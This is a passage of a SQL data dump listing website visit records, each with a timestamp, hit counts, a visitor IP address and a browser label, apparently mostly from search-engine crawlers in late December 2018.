,2,0,0,'157.55.39.233','other'),(361832,1546181768,1,1,0,0,'54.36.148.74','other'),(361833,1546181809,1,1,0,0,'54.36.148.84','other'),(361834,1546181894,9,9,0,0,'216.244.66.241','other'),(361835,1546181980,1,1,0,0,'66.102.9.40','chrome'),(361836,1546181981,1,1,0,0,'66.102.9.60','chrome'),(361837,1546181982,1,1,0,0,'35.187.132.181','chrome'),(361838,1546181986,1,1,0,0,'35.187.132.180','chrome'),(361839,1546182107,1,1,0,0,'8.29.198.27','other'),(361840,1546182230,1,1,0,0,'54.165.59.7','other'),(361841,1546182833,1,1,0,0,'88.99.2.203','other'),(361842,1546182834,1,1,0,0,'136.243.70.68','other'),(361843,1546182847,1,1,0,0,'54.36.149.17','other'),(361844,1546182934,2,2,0,0,'46.211.135.120','chrome'),(361845,1546182951,2,2,0,0,'216.244.66.241','other'),(361846,1546183063,1,1,0,0,'8.29.198.27','other'),(361847,1546183159,1,1,0,0,'66.249.66.155','chrome'),(361848,1546183160,1,1,0,0,'66.249.66.152','chrome'),(361849,1546183178,1,1,0,0,'54.36.148.202','other'),(361850,1546183254,1,1,0,0,'46.229.168.153','other'),(361851,1546183256,1,1,0,0,'46.229.168.141','other'),(361852,1546183262,1,1,0,0,'54.36.148.121','other'),(361853,1546183272,1,1,0,0,'54.36.148.253','other'),(361854,1546183330,1,1,0,0,'66.249.66.61','chrome'),(361855,1546183332,1,1,0,0,'66.249.66.44','chrome'),(361856,1546183474,1,1,0,0,'46.229.168.151','other'),(361857,1546183628,1,1,0,0,'157.55.39.230','other'),(361858,1546183823,1,1,0,0,'54.36.148.255','other'),(361859,1546183839,1,1,0,0,'54.36.148.235','other'),(361860,1546183877,2,2,0,0,'216.244.66.241','other'),(361861,1546183993,1,1,0,0,'207.46.13.73','other'),(361862,1546184175,1,1,0,0,'54.36.149.45','other'),(361863,1546184384,1,1,0,0,'54.36.148.173','other'),(361864,1546184602,1,1,0,0,'85.192.162.173','msie'),(361865,1546184696,1,1,0,0,'213.180.203.40','other'),(361866,1546184705,2,2,0,0,'95.108.181.75','other'),(361867,1546184712,2,2,0,0,'178.154.171.27','other'),(361868,1546184848,3,3,0,0,'216.244.66.241','other'),(361869,1546184856,1,1,0,0,'5.45.207.8','other'),(361870,1546184857,2,2,0,0,'52.53.201.78','chrome'),(361871,1546184896,1,1,0,0,'5.45.207.79','other'),(361872,1546184960,1,1,0,0,'157.55.39.233','other'),(361873,1546185044,1,1,0,0,'66.249.66.155','chrome'),(361875,1546185147,5,5,0,0,'141.8.142.103','other'),(361876,1546185196,1,1,0,0,'54.36.149.33','other'),(361877,1546185229,2,2,0,0,'5.45.207.19','other'),(361878,1546185371,1,1,0,0,'54.36.148.123','other'),(361879,1546185430,1,1,0,0,'37.9.113.103','other'),(361880,1546185487,3,3,0,0,'178.154.244.11','other'),(361881,1546185520,1,1,0,0,'95.108.213.4','other'),(361882,1546185571,1,1,0,0,'178.154.244.65','other'),(361883,1546185579,1,1,0,0,'66.249.66.40','chrome'),(361884,1546185727,2,2,0,0,'213.180.203.40','other'),(361885,1546185810,6,6,0,0,'5.45.207.79','other'),(361886,1546185931,1,1,0,0,'46.229.168.152','other'),(361887,1546186071,1,1,0,0,'54.36.149.62','other'),(361888,1546186469,1,1,0,0,'95.108.213.4','other'),(361889,1546186534,1,1,0,0,'54.36.148.67','other'),(361890,1546186544,1,1,0,0,'54.36.149.34','other'),(361891,1546186792,1,1,0,0,'37.9.113.20','other'),(361892,1546187403,1,1,0,0,'54.36.149.12','other'),(361893,1546187425,1,1,0,0,'54.36.148.143','other'),(361894,1546187772,3,3,0,0,'216.244.66.241','other'),(361895,1546188044,1,1,0,0,'46.229.168.137','other'),(361896,1546188104,1,1,0,0,'54.36.148.66','other'),(361897,1546188171,1,1,0,0,'54.36.149.86','other'),(361898,1546188184,1,1,0,0,'54.36.148.36','other'),(361899,1546188396,1,1,0,0,'54.36.149.66','other'),(361900,1546188541,2,2,0,0,'66.249.66.40','chrome'),(361901,1546188799,1,1,0,0,'54.36.148.116','other'),(361902,1546188893,1,1,0,0,'54.36.149.45','other'),(361903,1546188999,1,1,0,0,'54.36.149.31','other'),(361904,1546189129,1,1,0,0,'66.249.66.57','chrome'),(361905,1546189273,1,1,0,0,'54.36.148.74','other'),(361906,1546189477,1,1,0,0,'207.46.13.73','other'),(361907,1546189580,1,1,0,0,'54.36.148.233','other'),(361908,1546189793,1,1,0,0,'40.77.167.87','other'),(361909,1546189951,1,1,0,0,'54.36.148.148','other'),(361910,1546190000,1,1,0,0,'5.45.207.19','other'),(361911,1546190033,1,1,0,0,'88.99.2.203','other'),(361912,1546190038,1,1,0,0,'46.229.168.143','other'),(361913,1546190044,1,1,0,0,'136.243.70.68','other'),(361914,1546190085,1,1,0,0,'54.36.148.125','other'),(361915,1546190155,1,1,0,0,'54.36.149.90','other'),(361916,1546190168,1,1,0,0,'54.36.148.167','other'),(361917,1546190571,3,3,0,0,'216.244.66.241','other'),(361918,1546190718,1,1,0,0,'54.36.148.87','other'),(361919,1546190782,1,1,0,0,'185.225.17.191','chrome'),(361920,1546190836,10,10,0,0,'144.76.40.222','other'),(361921,1546190948,1,1,0,0,'54.36.148.230','other'),(361922,1546191066,1,1,0,0,'54.36.148.143','other'),(361923,1546191126,1,1,0,0,'54.36.148.180','other'),(361924,1546191223,1,1,0,0,'157.55.39.230','other'),(361925,1546191226,1,1,0,0,'54.36.148.204','other'),(361926,1546191337,1,1,0,0,'54.36.148.135','other'),(361927,1546191835,1,1,0,0,'54.36.148.166','other'),(361928,1546191979,1,1,0,0,'54.36.149.87','other'),(361929,1546192185,1,1,0,0,'54.36.148.129','other'),(361930,1546192377,1,1,0,0,'54.36.149.91','other'),(361931,1546192580,1,1,0,0,'66.249.66.155','chrome'),(361933,1546192591,1,1,0,0,'54.36.148.27','other'),(361934,1546192739,1,1,0,0,'54.36.148.189','other'),(361935,1546192817,1,1,0,0,'95.163.255.116','other'),(361936,1546192830,1,1,0,0,'46.229.168.150','other'),(361937,1546192949,1,1,0,0,'8.29.198.27','other'),(361938,1546193049,1,1,0,0,'66.249.66.156','chrome'),(361939,1546193050,1,1,0,0,'66.249.66.154','chrome'),(361940,1546193077,1,1,0,0,'91.196.178.134','chrome'),(361941,1546193129,1,1,0,0,'54.36.148.237','other'),(361942,1546193139,1,1,0,0,'54.36.149.32','other'),(361943,1546193225,1,1,0,0,'85.192.162.173','msie'),(361944,1546193312,1,1,0,0,'95.163.255.103','other'),(361945,1546193485,4,4,0,0,'216.244.66.241','other'),(361946,1546193606,1,1,0,0,'54.36.149.22','other'),(361947,1546193781,1,1,0,0,'37.9.113.148','other'),(361948,1546193843,1,1,0,0,'95.163.255.96','other'),(361949,1546193854,1,1,0,0,'95.163.255.97','other'),(361950,1546193896,1,1,0,0,'8.29.198.26','other'),(361951,1546193924,2,2,0,0,'40.77.167.87','other'),(361952,1546194107,1,1,0,0,'91.196.178.134','chrome'),(361953,1546194259,1,1,0,0,'66.249.66.59','chrome'),(361954,1546194260,2,1,1,0,'66.249.66.44',''),(361955,1546194297,1,1,0,0,'54.36.148.152','other'),(361956,1546194404,1,1,0,0,'54.36.148.59','other'),(361957,1546194626,2,2,0,0,'5.45.207.19','other'),(361958,1546194677,1,1,0,0,'157.55.39.233','other'),(361959,1546194700,1,1,0,0,'87.250.224.47','other'),(361960,1546194740,2,2,0,0,'46.211.111.97','chrome'),(361961,1546194821,1,1,0,0,'54.36.149.63','other'),(361962,1546194831,1,1,0,0,'54.36.148.75','other'),(361963,1546194938,1,1,0,0,'207.46.13.73','other'),(361964,1546194970,1,1,0,0,'54.36.148.134','other'),(361965,1546195022,3,3,0,0,'5.45.207.79','other'),(361966,1546195202,1,1,0,0,'54.36.148.63','other'),(361967,1546195204,1,1,0,0,'216.244.66.241','other'),(361968,1546195263,1,1,0,0,'54.36.148.211','other'),(361969,1546195414,1,1,0,0,'54.36.149.59','other'),(361970,1546195503,1,1,0,0,'54.36.149.28','other'),(361971,1546195533,2,2,0,0,'5.45.207.19','other'),(361972,1546195581,3,3,0,0,'178.154.244.11','other'),(361973,1546195759,1,1,0,0,'178.154.244.65','other'),(361974,1546195932,1,1,0,0,'141.8.142.103','other'),(361975,1546195953,1,1,0,0,'54.36.148.215','other'),(361976,1546196052,1,1,0,0,'54.36.148.167','other'),(361977,1546196239,7,7,0,0,'216.244.66.241','other'),(361978,1546196425,1,1,0,0,'66.249.66.155','chrome'),(361979,1546196426,1,1,0,0,'66.249.66.154','chrome'),(361980,1546196533,1,1,0,0,'54.36.149.47','other'),(361981,1546196679,1,1,0,0,'54.36.148.15','other'),(361982,1546196813,2,2,0,0,'95.132.24.64','other'),(361983,1546196843,1,1,0,0,'54.36.148.228','other'),(361984,1546196933,2,2,0,0,'178.154.244.11','other'),(361985,1546196961,1,1,0,0,'5.45.207.19','other'),(361986,1546196997,1,1,0,0,'54.36.149.69','other'),(361987,1546197626,1,1,0,0,'207.46.13.73','other'),(361988,1546197708,1,1,0,0,'54.36.149.29','other'),(361989,1546197762,1,1,0,0,'157.55.39.230','other'),(361990,1546197972,1,1,0,0,'54.36.148.79','other'),(361991,1546198187,1,1,0,0,'54.36.149.82','other'),(361992,1546198400,1,1,0,0,'46.229.168.141','other'),(361993,1546198455,1,1,0,0,'46.229.168.154','other'),(361994,1546198600,1,1,0,0,'54.36.148.124','other'),(361995,1546198630,1,1,0,0,'207.46.13.73','other'),(361996,1546198894,1,1,0,0,'54.36.148.62','other'),(361997,1546198950,1,1,0,0,'54.36.148.173','other'),(361998,1546198961,1,1,0,0,'141.8.142.108','other'),(361999,1546199017,1,1,0,0,'95.163.255.113','other'),(362000,1546199060,8,8,0,0,'216.244.66.241','other'),(362001,1546199174,1,1,0,0,'77.111.247.102','chrome'),(362002,1546199238,1,1,0,0,'95.163.255.102','other'),(362003,1546199277,3,3,0,0,'157.55.39.233','other'),(362004,1546199400,1,1,0,0,'95.163.255.95','other'),(362005,1546199404,1,1,0,0,'95.163.255.92','other'),(362006,1546199440,1,1,0,0,'54.36.149.39','other'),(362007,1546199450,1,1,0,0,'95.163.255.109','other'),(362008,1546199761,1,1,0,0,'54.36.148.239','other'),(362009,1546199787,2,2,0,0,'95.163.255.103','other'),(362010,1546199915,1,1,0,0,'95.163.255.116','other'),(362011,1546200299,1,1,0,0,'54.36.148.195','other'),(362012,1546200459,1,1,0,0,'46.229.168.133','other'),(362013,1546200724,3,3,0,0,'207.46.13.73','other'),(362014,1546201221,1,1,0,0,'54.36.148.148','other'),(362015,1546201605,1,1,0,0,'54.36.149.15','other'),(362016,1546201894,6,6,0,0,'216.244.66.241','other'),(362017,1546202222,1,1,0,0,'66.249.66.152','chrome'),(362018,1546202355,2,2,0,0,'54.36.149.1','other'),(362019,1546202703,1,1,0,0,'54.36.149.42','other'),(362020,1546202822,1,1,0,0,'54.36.148.234','other'),(362021,1546203051,1,1,0,0,'66.249.66.155','chrome'),(362022,1546203377,1,1,0,0,'54.36.149.84','other'),(362023,1546203448,1,1,0,0,'54.36.148.236','other'),(362024,1546203624,1,1,0,0,'54.36.149.93','other'),(362025,1546203674,2,2,0,0,'178.154.244.11','other'),(362026,1546203682,1,1,0,0,'216.244.66.241','other'),(362027,1546203755,1,1,0,0,'54.36.149.6','other'),(362028,1546203796,1,1,0,0,'8.29.198.27','other'),(362029,1546204387,1,1,0,0,'54.36.148.118','other'),(362030,1546204579,1,1,0,0,'54.36.148.52','other'),(362031,1546204631,1,1,0,0,'54.36.148.240','other'),(362032,1546204724,1,1,0,0,'8.29.198.27','other'),(362033,1546204741,1,1,0,0,'54.36.148.84','other'),(362034,1546204753,6,6,0,0,'216.244.66.241','other'),(362035,1546204829,1,1,0,0,'66.249.66.157','chrome'),(362037,1546204854,1,1,0,0,'54.36.148.134','other'),(362038,1546205439,2,2,0,0,'66.249.66.156','chrome'),(362039,1546205557,1,1,0,0,'54.36.148.151','other'),(362040,1546205631,1,1,0,0,'66.249.66.40','chrome'),(362041,1546205675,1,1,0,0,'95.108.181.54','other'),(362042,1546205702,1,1,0,0,'87.250.224.64','other'),(362043,1546205721,1,1,0,0,'216.244.66.241','other'),(362044,1546205864,2,2,0,0,'66.249.66.42','chrome'),(362045,1546206585,1,1,0,0,'95.108.181.75','other'),(362046,1546206698,1,1,0,0,'66.249.66.157','chrome'),(362047,1546206699,1,1,0,0,'66.249.66.154','chrome'),(362048,1546206811,1,1,0,0,'54.36.149.17','other'),(362049,1546206840,2,2,0,0,'46.211.53.112','chrome'),(362050,1546206918,1,1,0,0,'54.36.148.122','other'),(362051,1546206959,1,1,0,0,'54.36.149.89','other'),(362052,1546207012,1,1,0,0,'95.163.255.109','other'),(362053,1546207014,2,2,0,0,'40.77.167.155','other'),(362054,1546207073,1,1,0,0,'5.45.207.79','other'),(362055,1546207096,1,1,0,0,'157.55.39.113','other'),(362056,1546207253,1,1,0,0,'66.249.66.152','chrome'),(362057,1546207335,1,1,0,0,'54.36.149.55','other'),(362058,1546207381,1,1,0,0,'54.36.148.43','other'),(362059,1546207391,1,1,0,0,'54.36.148.118','other'),(362060,1546207530,1,1,0,0,'95.163.255.115','other'),(362061,1546207543,1,1,0,0,'66.249.66.42','chrome'),(362062,1546207546,3,3,0,0,'216.244.66.241','other'),(362063,1546207642,1,1,0,0,'95.163.255.106','other'),(362064,1546207656,1,1,0,0,'95.163.255.117','other'),(362065,1546207661,1,1,0,0,'54.36.148.161','other'),(362066,1546207708,1,1,0,0,'54.36.148.130','other'),(362067,1546207719,2,2,0,0,'95.163.255.114','other'),(362068,1546207814,2,2,0,0,'95.163.255.107','other'),(362069,1546207990,1,1,0,0,'54.36.149.62','other'),(362070,1546208236,1,1,0,0,'40.77.167.4','other'),(362071,1546208375,1,1,0,0,'54.36.148.238','other'),(362072,1546208641,1,1,0,0,'54.36.148.235','other'),(362073,1546209109,1,1,0,0,'54.36.149.56','other'),(362074,1546209154,1,1,0,0,'54.36.148.74','other'),(362075,1546209164,1,1,0,0,'54.36.149.17','other'),(362076,1546209166,1,1,0,0,'82.145.222.241','chrome'),(362077,1546209168,1,1,0,0,'46.133.176.249','chrome'),(362078,1546209326,1,1,0,0,'46.229.168.142','other'),(362079,1546209361,1,1,0,0,'54.36.148.178','other'),(362080,1546209383,1,1,0,0,'54.36.148.132','other'),(362081,1546209613,1,1,0,0,'54.36.148.107','other'),(362082,1546209921,1,1,0,0,'157.55.39.230','other'),(362083,1546209980,1,1,0,0,'54.36.148.186','other'),(362084,1546210197,1,1,0,0,'54.36.148.144','other'),(362085,1546210279,1,1,0,0,'40.77.167.155','other'),(362086,1546210303,1,1,0,0,'46.229.168.141','other'),(362087,1546210305,1,1,0,0,'46.229.168.139','other'),(362088,1546210423,7,7,0,0,'216.244.66.241','other'),(362089,1546210455,1,1,0,0,'54.36.148.71','other'),(362090,1546210559,1,1,0,0,'37.9.113.148','other'),(362091,1546210669,1,1,0,0,'54.36.148.197','other'),(362092,1546210692,1,1,0,0,'95.163.255.94','other'),(362093,1546210695,1,1,0,0,'95.163.255.97','other'),(362094,1546210854,1,1,0,0,'54.36.149.87','other'),(362095,1546211099,1,1,0,0,'54.36.148.103','other'),(362096,1546211108,1,1,0,0,'54.36.148.161','other'),(362097,1546211120,1,1,0,0,'37.9.113.20','other'),(362098,1546211235,1,1,0,0,'54.36.149.67','other'),(362099,1546211373,1,1,0,0,'66.249.66.44','chrome'),(362100,1546211396,1,1,0,0,'46.229.168.150','other'),(362101,1546211469,1,1,0,0,'46.229.168.142','other'),(362102,1546211508,2,2,0,0,'37.147.244.22','firefox'),(362103,1546211577,1,1,0,0,'46.229.168.145','other'),(362104,1546211608,1,1,0,0,'46.229.168.138','other'),(362105,1546211700,1,1,0,0,'54.36.148.126','other'),(362106,1546211710,1,1,0,0,'54.36.149.88','other'),(362107,1546211715,1,1,0,0,'216.244.66.241','other'),(362108,1546211873,2,2,0,0,'40.77.167.155','other'),(362109,1546212109,1,1,0,0,'5.45.207.19','other'),(362110,1546212233,1,1,0,0,'157.55.39.137','other'),(362111,1546212432,1,1,0,0,'5.45.207.79','other'),(362112,1546212779,1,1,0,0,'54.36.148.64','other'),(362113,1546212834,1,1,0,0,'66.249.66.154','chrome'),(362114,1546212882,1,1,0,0,'46.229.168.149','other'),(362115,1546212884,1,1,0,0,'46.229.168.137','other'),(362116,1546213075,1,1,0,0,'40.77.167.155','other'),(362117,1546213078,1,1,0,0,'46.229.168.147','other'),(362118,1546213080,1,1,0,0,'46.229.168.134','other'),(362119,1546213223,1,1,0,0,'54.36.149.84','other'),(362120,1546213260,2,2,0,0,'216.244.66.241','other'),(362121,1546213318,1,1,0,0,'157.55.39.241','other'),(362122,1546213361,1,1,0,0,'54.36.148.59','other'),(362123,1546213601,1,1,0,0,'207.46.13.227','other'),(362124,1546213720,1,1,0,0,'54.36.148.211','other'),(362125,1546213801,1,1,0,0,'54.36.148.32','other'),(362126,1546213819,1,1,0,0,'54.36.148.102','other'),(362127,1546213922,1,1,0,0,'54.36.148.190','other'),(362128,1546213947,1,1,0,0,'54.36.148.38','other'),(362129,1546214135,1,1,0,0,'54.36.148.210','other'),(362130,1546214180,2,2,0,0,'216.244.66.241','other'),(362131,1546214187,1,1,0,0,'41.169.146.2','chrome'),(362132,1546214189,1,1,0,0,'31.184.238.115','chrome'),(362133,1546214198,1,1,0,0,'54.36.148.154','other'),(362134,1546214287,1,1,0,0,'139.180.225.144','chrome'),(362135,1546214323,1,1,0,0,'209.59.228.69','chrome'),(362136,1546214338,1,1,0,0,'54.36.149.62','other'),(362137,1546214339,1,1,0,0,'66.249.66.40','chrome'),(362138,1546214416,1,1,0,0,'54.36.148.50','other'),(362139,1546214563,1,1,0,0,'54.36.148.107','other'),(362140,1546214600,1,1,0,0,'54.36.148.157','other'),(362141,1546214645,1,1,0,0,'8.29.198.27','other'),(362142,1546214728,1,1,0,0,'141.8.142.103','other'),(362143,1546214875,1,1,0,0,'54.36.149.76','other'),(362144,1546214901,2,2,0,0,'5.45.207.79','other'),(362145,1546214905,5,5,0,0,'5.45.207.19','other'),(362146,1546214916,4,4,0,0,'178.154.244.11','other'),(362147,1546215335,1,1,0,0,'40.77.167.72','other'),(362148,1546215389,1,1,0,0,'54.36.148.187','other'),(362149,1546215465,1,1,0,0,'40.77.167.155','other'),(362150,1546215555,1,1,0,0,'8.29.198.27','other'),(362151,1546215563,1,1,0,0,'37.9.113.20','other'),(362152,1546215633,1,1,0,0,'141.8.142.108','other'),(362153,1546215710,2,2,0,0,'213.180.203.9','other'),(362154,1546215722,2,2,0,0,'87.250.224.65','other'),(362155,1546215729,3,3,0,0,'157.55.39.241','other'),(362156,1546215790,1,1,0,0,'5.255.253.38','other'),(362157,1546215826,1,1,0,0,'54.36.149.90','other'),(362158,1546215961,1,1,0,0,'141.8.183.23','other'),(362159,1546215966,1,1,0,0,'141.8.142.103','other'),(362160,1546216052,1,1,0,0,'54.36.149.0','other'),(362161,1546216114,4,4,0,0,'216.244.66.241','other'),(362162,1546216140,1,1,0,0,'54.36.148.235','other'),(362163,1546216442,1,1,0,0,'46.229.168.134','other'),(362164,1546216468,1,1,0,0,'46.229.168.140','other'),(362165,1546216545,1,1,0,0,'46.229.168.151','other'),(362166,1546216630,1,1,0,0,'178.154.244.11','other'),(362167,1546216657,3,3,0,0,'5.45.207.79','other'),(362168,1546216659,1,1,0,0,'95.108.213.4','other'),(362169,1546217080,1,1,0,0,'46.229.168.149','other'),(362170,1546217248,1,1,0,0,'54.36.148.43','other'),(362171,1546217276,1,1,0,0,'5.255.253.16','other'),(362172,1546217368,1,1,0,0,'5.255.253.38','other'),(362173,1546217578,1,1,0,0,'54.36.149.59','other'),(362174,1546217669,1,1,0,0,'46.229.168.130','other'),(362175,1546217728,1,1,0,0,'193.201.225.45','other'),(362176,1546217745,1,1,0,0,'95.163.255.69','other'),(362177,1546217748,1,1,0,0,'95.163.255.64','other'),(362178,1546217773,1,1,0,0,'54.36.148.165','other'),(362179,1546217822,2,2,0,0,'66.249.66.157','chrome'),(362180,1546217823,2,2,0,0,'66.249.66.156','chrome'),(362181,1546217870,26,26,0,0,'37.17.172.132','firefox'),(362182,1546217871,2,2,0,0,'216.244.66.241','other'),(362183,1546217872,1,1,0,0,'54.36.148.148','other'),(362184,1546218145,1,1,0,0,'54.36.149.19','other'),(362185,1546218167,1,1,0,0,'54.36.149.31','other'),(362186,1546218290,1,1,0,0,'54.36.149.46','other'),(362187,1546218491,1,1,0,0,'66.249.66.155','chrome'),(362188,1546218492,1,1,0,0,'66.249.66.152','chrome'),(362189,1546218515,1,1,0,0,'54.36.148.65','other'),(362190,1546218698,1,1,0,0,'46.229.168.133','other'),(362191,1546218749,2,2,0,0,'40.77.167.72','other'),(362192,1546218757,1,1,0,0,'157.55.39.137','other'),(362193,1546218798,7,7,0,0,'37.17.172.132','firefox'),(362194,1546218859,1,1,0,0,'54.36.149.95','other'),(362195,1546218907,1,1,0,0,'54.36.149.27','other'),(362196,1546218931,5,5,0,0,'216.244.66.241','other'),(362197,1546219103,1,1,0,0,'54.36.148.137','other'),(362198,1546219188,1,1,0,0,'46.229.168.145','other'),(362199,1546219332,1,1,0,0,'54.36.148.139','other'),(362200,1546219394,2,2,0,0,'95.163.255.99','other'),(362201,1546219397,1,1,0,0,'95.163.255.98','other'),(362202,1546219479,1,1,0,0,'95.163.255.97','other'),(362203,1546219755,1,1,0,0,'13.66.139.0','other'),(362204,1546219780,1,1,0,0,'5.45.207.19','other'),(362205,1546220090,1,1,0,0,'40.77.167.56','other'),(362206,1546220111,2,2,0,0,'54.214.56.51','chrome'),(362207,1546220209,1,1,0,0,'54.36.149.61','other'),(362208,1546220428,1,1,0,0,'216.244.66.241','other'),(362209,1546220447,1,1,0,0,'54.36.149.30','other'),(362210,1546220471,1,1,0,0,'54.36.148.89','other'),(362211,1546220529,1,1,0,0,'54.36.148.159','other'),(362212,1546220530,2,2,0,0,'5.45.207.79','other'),(362213,1546220801,1,1,0,0,'54.36.148.170','other'),(362214,1546220942,1,1,0,0,'46.229.168.132','other'),(362215,1546221075,1,1,0,0,'54.36.149.16','other'),(362216,1546221673,1,1,0,0,'87.250.224.64','other'),(362217,1546221868,1,1,0,0,'213.180.203.23','other'),(362218,1546221905,10,10,0,0,'216.244.66.241','other'),(362219,1546222023,1,1,0,0,'54.36.148.209','other'),(362220,1546222130,1,1,0,0,'54.36.148.167','other'),(362221,1546222133,2,2,0,0,'95.163.255.99','other'),(362222,1546222136,1,1,0,0,'95.163.255.94','other'),(362223,1546222298,1,1,0,0,'54.36.149.38','other'),(362224,1546222316,1,1,0,0,'95.163.255.92','other'),(362225,1546222464,3,3,0,0,'157.55.39.239','other'),(362226,1546222676,1,1,0,0,'66.249.66.156','chrome'),(362227,1546222816,1,1,0,0,'40.77.167.56','other'),(362228,1546223302,1,1,0,0,'54.36.148.65','other'),(362229,1546223644,1,1,0,0,'54.36.149.19','other'),(362230,1546223713,1,1,0,0,'46.229.168.134','other'),(362231,1546223774,1,1,0,0,'95.163.255.95','other'),(362232,1546223777,1,1,0,0,'95.163.255.94','other'),(362233,1546224017,1,1,0,0,'40.77.167.72','other'),(362234,1546224280,1,1,0,0,'54.36.148.179','other'),(362235,1546224654,1,1,0,0,'141.8.142.103','other'),(362236,1546224782,7,7,0,0,'216.244.66.241','other'),(362237,1546225148,1,1,0,0,'54.36.148.171','other'),(362238,1546225232,1,1,0,0,'54.36.148.51','other'),(362239,1546225339,1,1,0,0,'54.36.148.161','other'),(362240,1546225401,5,5,0,0,'5.45.207.79','other'),(362241,1546225443,1,1,0,0,'46.229.168.151','other'),(362242,1546225447,6,6,0,0,'178.154.244.11','other'),(362243,1546225479,1,1,0,0,'8.29.198.26','other'),(362244,1546225488,1,1,0,0,'54.36.148.125','other'),(362245,1546225724,2,2,0,0,'141.8.142.103','other'),(362246,1546225808,1,1,0,0,'95.108.213.4','other'),(362247,1546226047,2,2,0,0,'5.45.207.19','other'),(362248,1546226078,1,1,0,0,'54.36.148.196','other'),(362249,1546226103,6,6,0,0,'66.249.66.155','chrome'),(362251,1546226147,1,1,0,0,'54.36.148.184','other'),(362252,1546226192,2,2,0,0,'66.249.66.157','chrome'),(362253,1546226193,2,2,0,0,'66.249.66.154','chrome'),(362254,1546226207,1,1,0,0,'216.244.66.241','other'),(362255,1546226280,1,1,0,0,'54.36.149.33','other'),(362256,1546226370,1,1,0,0,'5.45.207.79','other'),(362257,1546226378,6,6,0,0,'66.249.66.156','chrome'),(362258,1546226389,1,1,0,0,'8.29.198.27','other'),(362259,1546226625,1,1,0,0,'141.8.142.103','other'),(362260,1546226680,3,3,0,0,'66.249.66.152','chrome'),(362261,1546227110,1,1,0,0,'40.77.167.56','other'),(362262,1546227269,1,1,0,0,'157.55.39.137','other'),(362263,1546227551,1,1,0,0,'66.249.66.155','chrome'),(362264,1546227552,1,1,0,0,'66.249.66.156','chrome'),(362265,1546227585,10,10,0,0,'216.244.66.241','other'),(362266,1546227683,1,1,0,0,'46.229.168.135','other'),(362267,1546227725,1,1,0,0,'54.36.148.68','other'),(362268,1546228053,1,1,0,0,'54.36.149.94','other'),(362269,1546228506,1,1,0,0,'66.249.66.155','chrome'),(362270,1546228507,1,1,0,0,'66.249.66.152','chrome'),(362271,1546228550,1,1,0,0,'54.36.149.99','other'),(362272,1546228585,1,1,0,0,'54.36.148.167','other'),(362273,1546228615,1,1,0,0,'54.36.148.67','other'),(362274,1546229248,1,1,0,0,'46.229.168.149','other'),(362275,1546229339,1,1,0,0,'37.9.113.20','other'),(362276,1546229458,1,1,0,0,'95.163.255.95','other'),(362277,1546229461,2,2,0,0,'95.163.255.93','other'),(362278,1546229615,1,1,0,0,'95.163.255.98','other'),(362279,1546229708,1,1,0,0,'46.229.168.129','other'),(362280,1546229710,1,1,0,0,'46.229.168.142','other'),(362281,1546229869,1,1,0,0,'54.36.148.64','other'),(362282,1546230300,1,1,0,0,'95.108.213.4','other'),(362283,1546230342,7,7,0,0,'216.244.66.241','other'),(362284,1546230392,1,1,0,0,'54.36.148.18','other'),(362285,1546230470,3,3,0,0,'5.45.207.19','other'),(362286,1546230489,1,1,0,0,'180.76.15.15','other'),(362287,1546230490,1,1,0,0,'180.76.15.13','other'),(362288,1546230504,1,1,0,0,'54.36.148.159','other'),(362289,1546230677,1,1,0,0,'54.36.148.32','other'),(362290,1546230843,1,1,0,0,'46.229.168.135','other'),(362291,1546230999,1,1,0,0,'178.154.244.11','other'),(362292,1546231020,1,1,0,0,'54.36.149.30','other'),(362293,1546231888,1,1,0,0,'54.36.149.75','other'),(362294,1546231890,1,1,0,0,'216.244.66.241','other'),(362295,1546232227,1,1,0,0,'54.36.148.220','other'),(362296,1546232489,1,1,0,0,'180.76.15.24','other'),(362297,1546232490,1,1,0,0,'180.76.15.5','other'),(362298,1546232656,1,1,0,0,'157.55.39.137','other'),(362299,1546232747,1,1,0,0,'40.77.167.178','other'),(362300,1546233108,1,1,0,0,'157.55.39.71','other'),(362301,1546233191,4,4,0,0,'216.244.66.241','other'),(362302,1546233380,1,1,0,0,'54.36.148.182','other'),(362303,1546233612,1,1,0,0,'54.36.148.98','other'),(362304,1546233738,1,1,0,0,'95.163.255.181','other'),(362305,1546233740,1,1,0,0,'95.163.255.156','other'),(362306,1546233821,1,1,0,0,'54.36.148.158','other'),(362307,1546234001,1,1,0,0,'54.36.148.124','other'),(362308,1546234088,2,2,0,0,'95.163.255.99','other'),(362309,1546234166,1,1,0,0,'54.36.148.61','other'),(362310,1546234337,1,1,0,0,'54.36.148.39','other'),(362311,1546234354,1,1,0,0,'54.36.148.84','other'),(362312,1546234387,1,1,0,0,'54.36.149.15','other'),(362313,1546234795,1,1,0,0,'54.36.148.110','other'),(362314,1546234811,2,2,0,0,'216.244.66.241','other'),(362315,1546235141,2,2,0,0,'46.229.168.145','other'),(362316,1546235143,1,1,0,0,'46.229.168.135','other'),(362317,1546235148,1,1,0,0,'54.36.148.151','other'),(362318,1546235844,1,1,0,0,'54.36.148.165','other'),(362319,1546236072,7,7,0,0,'216.244.66.241','other'),(362320,1546236088,1,1,0,0,'54.36.148.230','other'),(362321,1546236311,1,1,0,0,'8.29.198.26','other'),(362322,1546236565,1,1,0,0,'54.36.148.227','other'),(362323,1546236643,1,1,0,0,'95.108.213.4','other'),(362324,1546236661,1,1,0,0,'213.180.203.9','other'),(362325,1546236685,2,2,0,0,'185.220.101.26','other'),(362326,1546236729,1,1,0,0,'54.36.148.15','other'),(362327,1546236766,1,1,0,0,'54.36.149.13','other'),(362328,1546236807,1,1,0,0,'54.36.148.187','other'),(362329,1546236831,1,1,0,0,'54.36.148.226','other'),(362330,1546236878,1,1,0,0,'95.108.181.75','other'),(362331,1546236944,1,1,0,0,'157.55.39.217','other'),(362332,1546236989,2,2,0,0,'66.249.66.156','chrome'),(362333,1546237039,1,1,0,0,'40.77.167.178','other'),(362334,1546237151,1,1,0,0,'216.244.66.241','other'),(362335,1546237222,1,1,0,0,'8.29.198.25','other'),(362336,1546237257,1,1,0,0,'54.36.149.11','other'),(362337,1546237326,2,2,0,0,'91.196.178.130','firefox'),(362338,1546237620,1,1,0,0,'54.36.148.27','other'),(362339,1546237961,1,1,0,0,'46.229.168.130','other'),(362340,1546238292,1,1,0,0,'157.55.39.217','other'),(362341,1546238294,1,1,0,0,'141.8.142.81','other'),(362342,1546238486,1,1,0,0,'40.77.167.178','other'),(362343,1546238590,1,1,0,0,'54.36.149.97','other'),(362344,1546238630,1,1,0,0,'128.68.35.251','msie'),(362345,1546238673,1,1,0,0,'54.36.148.69','other'),(362346,1546239050,1,1,0,0,'54.36.149.84','other'),(362347,1546239065,1,1,0,0,'54.36.148.29','other'),(